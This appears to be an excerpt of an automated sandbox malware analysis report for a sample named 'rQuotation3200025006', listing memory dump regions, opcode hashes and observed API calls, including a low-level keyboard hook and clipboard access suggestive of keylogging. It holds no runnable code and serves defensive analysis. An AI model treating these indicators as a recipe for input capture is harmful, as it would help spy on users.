                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e90b7e1125c9bf9808451dd9b0c1283c05902c7b6451f5ece75aaa52d1ab982a
                                        • Instruction ID: 39b197d15ea120dde495f732d7d10f278c94afac7c824e574b0eb14997825ea2
                                        • Opcode Fuzzy Hash: e90b7e1125c9bf9808451dd9b0c1283c05902c7b6451f5ece75aaa52d1ab982a
                                        • Instruction Fuzzy Hash: D4A16E32E002198FDF05DFB5C84059EBBB2FF86310B15857AE906EB226DB71E956CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e077ce77f14e4dde1d34781372c2a91e45247b3db61d4a06f26e628112ca7d3c
                                        • Instruction ID: 5ee195121bcdf0f87ca723096e58e9f1721fcf6328fa7929dff7535069f59735
                                        • Opcode Fuzzy Hash: e077ce77f14e4dde1d34781372c2a91e45247b3db61d4a06f26e628112ca7d3c
                                        • Instruction Fuzzy Hash: 41D11531D10B1ACADB10EB64D954A9DB3B1FF95300F509B9AE5093B225FB70AAC4CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ecbd76859b3333ee3948f760b7015d31df874aa0701ea9971fe32e349d29f9e
                                        • Instruction ID: 5fc3bf3482922aad929a427fca1e7fa6831bd61e42f007725570bb505fdec8d8
                                        • Opcode Fuzzy Hash: 0ecbd76859b3333ee3948f760b7015d31df874aa0701ea9971fe32e349d29f9e
                                        • Instruction Fuzzy Hash: A951FB70E002198FCB14CFA9D5805EEBBF2EF89304F24C1A9D458AB216D771A941CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b23f49e7dbb11869a7c13cd387caeca01a92cb7357d8e98ec62082e8e1bc3c8
                                        • Instruction ID: e3c2c2a7a0521700072031fa5cc7a9ac658a208ac9bd99b92659a6e8e19fc090
                                        • Opcode Fuzzy Hash: 8b23f49e7dbb11869a7c13cd387caeca01a92cb7357d8e98ec62082e8e1bc3c8
                                        • Instruction Fuzzy Hash: 9951E674E002198FDB14DFA9D5805EEBBF2BF89304F24C1A9D458A7316D771A942CFA0

                                        Execution Graph

                                        Execution Coverage:13.1%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:1.2%
                                        Total number of Nodes:253
                                        Total number of Limit Nodes:30

                                        Control-flow Graph

                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0692D458,00000000,00000000), ref: 0692D66B
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: da2d435dbe4c0b215a9b802118618c73e8bdf741877d6c3dfc27e6ae1492d5ef
                                        • Instruction ID: 817869b7e9901c049a49007b67777e0a949e58d3011e8315d5caaaaf068c43f1
                                        • Opcode Fuzzy Hash: da2d435dbe4c0b215a9b802118618c73e8bdf741877d6c3dfc27e6ae1492d5ef
                                        • Instruction Fuzzy Hash: 502147B1D002199FCB54CF9AC884BEEFBF4EF88310F10842AE419A7250C774A944CFA5
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 440f82d690fc5aa65e3d640d33da1e6a909264273be2b1ebe788fab6d809b792
                                        • Instruction ID: 1ca1b81f9542470f12b9096de618d8545cabdc2a18daa803cf2bb8dda4aa0799
                                        • Opcode Fuzzy Hash: 440f82d690fc5aa65e3d640d33da1e6a909264273be2b1ebe788fab6d809b792
                                        • Instruction Fuzzy Hash: 0062AF34A002149FDB54DFA8D994BAEB7F6EF88314F248469E406DB754DB35EC46CB80

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: XM$XM$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2488550430
                                        • Opcode ID: 98d08998d7977ab898a79d75c39c6b5db8c38aa2250a44a49a0ae3afceb52317
                                        • Instruction ID: 7ee286b053cb0140954d8f06ec45fbb7429c4097ffe1bfae0b419ea119116ad2
                                        • Opcode Fuzzy Hash: 98d08998d7977ab898a79d75c39c6b5db8c38aa2250a44a49a0ae3afceb52317
                                        • Instruction Fuzzy Hash: CDE16C30E102198FCF69DF69D5846AEB7B6EF84300F208929D41AEB758DB35DC46CB91

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: ed4ed3da256c84186c8233af43e25252ea9f38f976ff35c8dbd66ade074f727b
                                        • Instruction ID: fc917094e032066c746b9800ec5646a969e2d647a506d14c133ab2045bd8aeeb
                                        • Opcode Fuzzy Hash: ed4ed3da256c84186c8233af43e25252ea9f38f976ff35c8dbd66ade074f727b
                                        • Instruction Fuzzy Hash: 80916D30B1021A8FDB54DB69D950BAEB3F6AFC9304F208569C80DEB344EB70DD468B95

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q
                                        • API String ID: 0-831282457
                                        • Opcode ID: 9fe4e2889affd861365fa77c4c8583825394c3700591b0aa081a78bd2afaee88
                                        • Instruction ID: 8ffa639a89c358bf11556a4c802cd068ea02b3235fc6e00bb978bbdc635957a0
                                        • Opcode Fuzzy Hash: 9fe4e2889affd861365fa77c4c8583825394c3700591b0aa081a78bd2afaee88
                                        • Instruction Fuzzy Hash: 74623F30A002168FCB55EB69D590A5EB7F2FF84304F208A29D409DF769DB71ED4ACB81

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq$(bq$(bq
                                        • API String ID: 0-2716923250
                                        • Opcode ID: 4d0bf0c2b12e415bf5173778e5ca7be9221ad6c63efbac3538dd9c135edfd235
                                        • Instruction ID: e1d3458dc1384c6b34f10812aa0ac57700b80f259851ff03b786966353ecc9d3
                                        • Opcode Fuzzy Hash: 4d0bf0c2b12e415bf5173778e5ca7be9221ad6c63efbac3538dd9c135edfd235
                                        • Instruction Fuzzy Hash: C7D1AC30E402099FCB44DFA9C8546AEBBF2EF88310F14C569E405AB395DB74AE41CB91

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq$\Ocq
                                        • API String ID: 0-3575482020
                                        • Opcode ID: a3012a9e48d29cf1d96d224442d5c0554e22426d65de91a7f97c5f647bacc720
                                        • Instruction ID: cc330f2469be9076e7befb1462bc230da5ecc3749466cfd00c4e8bdae6df395f
                                        • Opcode Fuzzy Hash: a3012a9e48d29cf1d96d224442d5c0554e22426d65de91a7f97c5f647bacc720
                                        • Instruction Fuzzy Hash: 3B615D31E002189FEB54DFB5C855BAEBBF6FB88700F208829E105AB395DB758D458B91

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: nKvq$nKvq
                                        • API String ID: 0-2223595353
                                        • Opcode ID: 7236bb4012440fce99d1ad5b32760efcd6477cb565f117157a4d218a521b851c
                                        • Instruction ID: 3e4fbaaa5a6716f0e1d838ed27f1fe1e6dfff60bc1eac1b6b13a70bbc279dd91
                                        • Opcode Fuzzy Hash: 7236bb4012440fce99d1ad5b32760efcd6477cb565f117157a4d218a521b851c
                                        • Instruction Fuzzy Hash: 29B16C75E006068FCB54DF68C4909AEFBB2BF88310B15C655ED55AB366DB30ED82CB90

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: nKvq$nKvq
                                        • API String ID: 0-2223595353
                                        • Opcode ID: 5463e854004fca27b630ed8ff5ba95ab883c9b2ac51fc521fe575ff74ee79840
                                        • Instruction ID: d8fb42065952f566cb91703a882fa44ce0cdcc8d59e6c13000ffd8fc198ebae8
                                        • Opcode Fuzzy Hash: 5463e854004fca27b630ed8ff5ba95ab883c9b2ac51fc521fe575ff74ee79840
                                        • Instruction Fuzzy Hash: 71B14935E006068FCB58DF58C4909AEFBB2BF88310B158655ED55AB356DB30FD82CB90

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377
                                        • Opcode ID: 46d5e5512c01e9fad730f8f9bd502f12a347498c41c09a0098125d019eade238
                                        • Instruction ID: 41cfe89d539ea064225418c3f7bb30f9b6fa05500991013e1f8b6bef4737b709
                                        • Opcode Fuzzy Hash: 46d5e5512c01e9fad730f8f9bd502f12a347498c41c09a0098125d019eade238
                                        • Instruction Fuzzy Hash: 2B514E30B101159FDB54EB79D990BAEB3FAABC8344F108469C40DEB388EB71DC428B95

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq
                                        • API String ID: 0-936005338
                                        • Opcode ID: 9f36968471a77c0181230b60651007113ef8c948be0a37b12787a868f71c5900
                                        • Instruction ID: bb418e3913d6d551bb45081449ad4741e44f810ba8070a1fc2c4891a47400803
                                        • Opcode Fuzzy Hash: 9f36968471a77c0181230b60651007113ef8c948be0a37b12787a868f71c5900
                                        • Instruction Fuzzy Hash: 49517D71F102189FDB55DFB4C855BAEBBF6BF88700F208929E105EB395DA758C018B91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4161716705.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_2a60000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3fdb09d282cc7c5d452cf3d7f9b75058edd46d9a0de1fefe314873baaa6f1b04
                                        • Instruction ID: 222fb66981f256ebea178acc3a6c9debeaa7cd33870a5203610e0ff79776b885
                                        • Opcode Fuzzy Hash: 3fdb09d282cc7c5d452cf3d7f9b75058edd46d9a0de1fefe314873baaa6f1b04
                                        • Instruction Fuzzy Hash: E8411332E103558FCB14DFA9D8446AEBBF5FF88320F14866AE409A7350DB78A841CBD0
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069260EA
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: d3e808d2547b7e4edad550740fcf141d7c4e00e3f56a48ce47a14fd4b2155b99
                                        • Instruction ID: de752e5038f8aefa9e9a18d8e4d2a5ad71923421dc44ce67307d18d00754dae8
                                        • Opcode Fuzzy Hash: d3e808d2547b7e4edad550740fcf141d7c4e00e3f56a48ce47a14fd4b2155b99
                                        • Instruction Fuzzy Hash: ED51D0B5D00319DFDB14CF9AC984ADEBFB5BF48300F24852AE419AB614D775A885CF90
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069260EA
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0692AE29
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0692B075), ref: 0692B0FF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0692D458,00000000,00000000), ref: 0692D66B
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06929F5F
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06929F5F
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0692D458,00000000,00000000), ref: 0692D66B
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000), ref: 02A680B0
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4161716705.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_2a60000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000), ref: 02A680B0
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4161716705.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_2a60000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0692B075), ref: 0692B0FF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 02A6EFDF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4161716705.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_2a60000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0692B9BD
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 06924F96
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 06924F96
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0692B9BD
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0692B075), ref: 0692B0FF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0692B9BD
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Ocq
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27364cbeabdb043e6483446986e20376b14c9d667d07880ac1d127af2c214f26
                                        • Instruction ID: 019df24523c2f0ac903ed064adbbc0a3f2aab364d54e6bd0da5b67468ab00afa
                                        • Opcode Fuzzy Hash: 27364cbeabdb043e6483446986e20376b14c9d667d07880ac1d127af2c214f26
                                        • Instruction Fuzzy Hash: F032BE30B00615CFDB54DB68D990BAEB7B6FB88310F208925E406EB794DB35EC42CB91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e948c36f930771a4c6d876e618ea9de62e527e33d04729a1226466fd71a5574e
                                        • Instruction ID: f50c37d163fe74d3961d00b36d44b84f078b85ce6e73ce5158601390e41fb170
                                        • Opcode Fuzzy Hash: e948c36f930771a4c6d876e618ea9de62e527e33d04729a1226466fd71a5574e
                                        • Instruction Fuzzy Hash: E141AD30D407089FCB54DFA9C8446DEBBF1FF89300F14C669E409AB255EB70AA80CB90
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b68280122229a3a3bec9ed2b29d0863d0b75fa5bcd090cf025e75218c126193
                                        • Instruction ID: 4461c4fd39e608e47f90aa25be1bac3ebcc2ef42cf80ba251bde20be57e937a0
                                        • Opcode Fuzzy Hash: 1b68280122229a3a3bec9ed2b29d0863d0b75fa5bcd090cf025e75218c126193
                                        • Instruction Fuzzy Hash: ADA1C430F101298FEF64CAA8D5947AEB7FAEB99310F304825E405E7799CA34DC818B56
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7bfad49491b2e610ad5b1ec5de5ca830c2010dec33ac250a1effb4d84f4a3284
                                        • Instruction ID: 38c9a6284f17bdc2d2e12fd49bbae3f6814d9ce79ab938c4660cb877c98b8ccd
                                        • Opcode Fuzzy Hash: 7bfad49491b2e610ad5b1ec5de5ca830c2010dec33ac250a1effb4d84f4a3284
                                        • Instruction Fuzzy Hash: B761B071F000215FCF549A7EC88466FBADBAFC5620B25443AE80EDB364EE65DD0287D6
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af85482e6cedec01b26ad70c5b7e98fbf458ab7480771598b9e50ea7ed7094a3
                                        • Instruction ID: a85412fbe37b76c036f118f85dce0e191bf091d21096047d87edba3b2d404b59
                                        • Opcode Fuzzy Hash: af85482e6cedec01b26ad70c5b7e98fbf458ab7480771598b9e50ea7ed7094a3
                                        • Instruction Fuzzy Hash: 3B815A30B102159FDB44DFA9D4947AEB7F6AF89704F218429D40AEB394EB34DC428B91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b638413e7b76789dce789feb8da0c7dd1c5d3e07180cad22073ff8d47751498f
                                        • Instruction ID: 3ed32b6c940a01075ad3c15e15947f9909872c0bf64bfd84eb39093f03606355
                                        • Opcode Fuzzy Hash: b638413e7b76789dce789feb8da0c7dd1c5d3e07180cad22073ff8d47751498f
                                        • Instruction Fuzzy Hash: 29814930B102199FDF44DFA9D4547AEB7F6AF89704F218429D40AEB394EB30EC428B91
                                        Memory Dump Source
